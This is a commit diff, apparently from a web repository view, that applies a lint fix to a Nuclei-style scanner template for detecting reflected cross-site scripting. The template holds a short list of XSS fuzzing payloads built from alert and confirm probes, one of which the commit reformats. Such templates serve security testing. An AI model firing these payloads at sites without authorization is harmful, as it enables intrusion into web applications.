lint fix
parent
f7993e9ccf
commit
6c4cc54f69
|
@ -1,8 +1,8 @@
|
|||
id: reflected-xss
|
||||
|
||||
info:
|
||||
name: Reflected Cross Site Scripting
|
||||
author: pdteam, 0xKayala
|
||||
name: Reflected Cross-Site Scripting
|
||||
author: pdteam,0xKayala
|
||||
severity: medium
|
||||
tags: xss,rxss,dast
|
||||
|
||||
|
@ -26,7 +26,7 @@ http:
|
|||
- "<body onload=alert({{first}})>"
|
||||
- "<marquee><img src=x onerror=confirm({{first}})></marquee>"
|
||||
- "'><img%20src=xxx:x%20\x20onerror=javascript:alert({{first}})>"
|
||||
- "'\/><img%20s+src+c=x%20on+onerror+%20="alert({{first}})"\>"
|
||||
- "'\"><img%20s+src+c=x%20on+onerror+%20=alert({{first}})>"
|
||||
- "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o"
|
||||
|
||||
fuzzing:
|
||||
|
|
Loading…
Reference in New Issue